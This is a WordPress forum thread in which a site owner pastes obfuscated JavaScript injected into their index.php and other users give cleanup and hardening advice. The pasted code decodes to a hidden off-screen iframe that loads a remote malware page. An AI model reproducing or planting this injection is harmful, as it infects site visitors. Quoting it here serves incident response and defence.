WordPressed Hacked!

  • geraldz

    (@geraldz)


    14 years, 11 months ago

    Both of my WordPress blogs were hacked on May 9th. One was an old version (I deleted it), the other is the latest up-to-date version. Here is the code inserted into the index.php file by the hacker:

    /** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?><?php echo ''; ?><?php echo '<script type="text/javascript">var GdpldPBsdvjorQSwfbuS = "kw60kw105kw102kw114kw97kw109kw101kw32kw119kw105kw100kw116kw104kw61kw34kw52kw56kw48kw34kw32kw104kw101kw105kw103kw104kw116kw61kw34kw54kw48kw34kw32kw115kw114kw99kw61kw34kw104kw116kw116kw112kw58kw47kw47kw100kw111kw119kw110kw108kw111kw97kw100kw45kw49kw50kw51kw46kw99kw110kw47kw118kw116kw105kw97kw100kw109kw105kw110kw50kw47kw116kw46kw112kw104kw112kw34kw32kw115kw116kw121kw108kw101kw61kw34kw98kw111kw114kw100kw101kw114kw58kw48kw112kw120kw59kw32kw112kw111kw115kw105kw116kw105kw111kw110kw58kw114kw101kw108kw97kw116kw105kw118kw101kw59kw32kw116kw111kw112kw58kw48kw112kw120kw59kw32kw108kw101kw102kw116kw58kw45kw53kw48kw48kw112kw120kw59kw32kw111kw112kw97kw99kw105kw116kw121kw58kw48kw59kw32kw102kw105kw108kw116kw101kw114kw58kw112kw114kw111kw103kw105kw100kw58kw68kw88kw73kw109kw97kw103kw101kw84kw114kw97kw110kw115kw102kw111kw114kw109kw46kw77kw105kw99kw114kw111kw115kw111kw102kw116kw46kw65kw108kw112kw104kw97kw40kw111kw112kw97kw99kw105kw116kw121kw61kw48kw41kw59kw32kw45kw109kw111kw122kw45kw111kw112kw97kw99kw105kw116kw121kw58kw48kw34kw62kw60kw47kw105kw102kw114kw97kw109kw101kw62";var cyFDWFBHQiyWMnIpDJig = GdpldPBsdvjorQSwfbuS.split("kw");var ERVwiosNQnfsmlwIqxQG = "";for (var gOdsCliGvQnAiIwQxpeN=1; gOdsCliGvQnAiIwQxpeN<cyFDWFBHQiyWMnIpDJig.length; gOdsCliGvQnAiIwQxpeN++){ERVwiosNQnfsmlwIqxQG+=String.fromCharCode(cyFDWFBHQiyWMnIpDJig[gOdsCliGvQnAiIwQxpeN]);}document.write(ERVwiosNQnfsmlwIqxQG)</script>'; ?>

    You can view the hacked page at [link removed] (WARNING – this may install a virus on your machine!)

Viewing 6 replies - 1 through 6 (of 6 total)
  • Samuel B

    (@samboll)

    14 years, 11 months ago

    you need to also look in all index files of any type on your site
    also inform your host if on a shared server as others were likely hacked as well

    matthewcainnewscountercom

    (@matthewcainnewscountercom)

    14 years, 11 months ago

    What do you do to get rid of the hack?

    Thread Starter geraldz

    (@geraldz)

    14 years, 11 months ago

    I’m waiting for WordPress to issue a release. I restored my backup index file.

    Samuel B

    (@samboll)

    14 years, 11 months ago

    check the db for stuff or an upgrade will only carry the hack forward

    matthew – you can google for how to handle hacks or search this forum as it comes up often

    Thread Starter geraldz

    (@geraldz)

    14 years, 11 months ago

    Hi Samboll – you are correct; all of the index files on my shared server were hacked.

    I have changed my file permissions to 444 (read only) which seems to have stopped the attacks.

    I have looked at the database but did not notice anything suspicious. What should I be looking for?

    Thanks for your help!

    whooami

    (@whooami)

    14 years, 11 months ago

    general fix advice:
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://wordpress.org/search/hacked?forums=1

    Make sure that your files on the server are clean. If that means deleting and reuploading, than you ought to do that. Files that you dont replace, should be looked at.

    Check for files that dont belong, directories that dont belong. Image files with changed timestamps — look at those. Its VERY common for there to be scripts on sites that are named in such a way to mask the fact that theyre scripts.

    Be suspicious, when youre looking at things. For instance, if you look at your wp-content/index.php — even that file has the malicious JS in it…

    Look at your permissions. Do you have world writable files? Any world-writable directories? Are they necessary?

    You need to check your database. Look for rogue plugins being loaded, look for rogue users (specifically look for a user named wordpress). You will NOT see rogue plugins or rogue users in your wp-admin/ area. You need to check your database.

    Make sure ALL of your plugins are current.

    Make sure your wordpress is current.

    Change your mysql password that wordpress uses (update your wp-config.php with that new password).

    change your ftp password.

    Change any admin level passwords on your blog.

    Look at any other software thats being used on your site. Is it current?

    Thats just an outline and not a complete list.

    There’s quite a bit to do, but it’s all necessary.

    If you cant do it all — by all means dont hesitate to enlist the help of someone who can. Quite a few of us do work on the side.

    If you arent archiving access logs, you ought to be, especially now.

    there’s also this:

    http://codex.wordpress.org/Hardening_WordPress

    There’s also gumblar and various iterations, variations, clones, and whatnot, going around. Getting rid of gumblar, etc.. means you also need to make sure that the remote computers being used to access your site’s FTP are clean. By that, I mean.. they need to be scanned for malware, and any found, removed.

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘WordPressed Hacked!’ is closed to new replies.